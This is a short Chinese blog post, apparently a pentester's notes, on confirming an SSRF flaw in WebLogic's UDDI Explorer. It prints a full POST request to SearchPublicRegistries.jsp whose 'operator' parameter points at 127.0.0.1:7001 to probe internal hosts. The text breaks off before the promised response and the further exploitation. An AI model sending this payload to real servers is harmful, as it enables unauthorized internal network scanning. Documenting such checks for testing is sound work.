weblogic-ssrf漏洞判定（一）

就目前小白学习情况，暂时认为weblogic中此两处存在SSRF漏洞隐患，SSRF漏洞的基本概念在此就不做阐述了。

此次我们只针对Search Public Registries 做SSRF漏洞（一）的解析，另一处SSRF漏洞静等工作接触时再补充。

下方为search操作提交的post包，operator参数存在ssrf漏洞。

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: ************************
User-Agent: ***************************8 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://***********************/uddiexplorer/SearchPublicRegistries.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=http://*************/; privatepublishurls=********************; JSESSIONID=**************************************
Connection: close
Upgrade-Insecure-Requests: 1

operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=1&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

若修改的内网地址/路径存在，返回值为：

则说明存在SSRF漏洞，已经证实存在访问内网的权限，7001是weblogic的默认端口，所以开放是必然的，其它端口的错误返回请各位自行验证，作为渗透测试我的工作

到这里就结束了，关于如何猜测内网网段甚至地址/端口/服务，及更深层次的利用，，，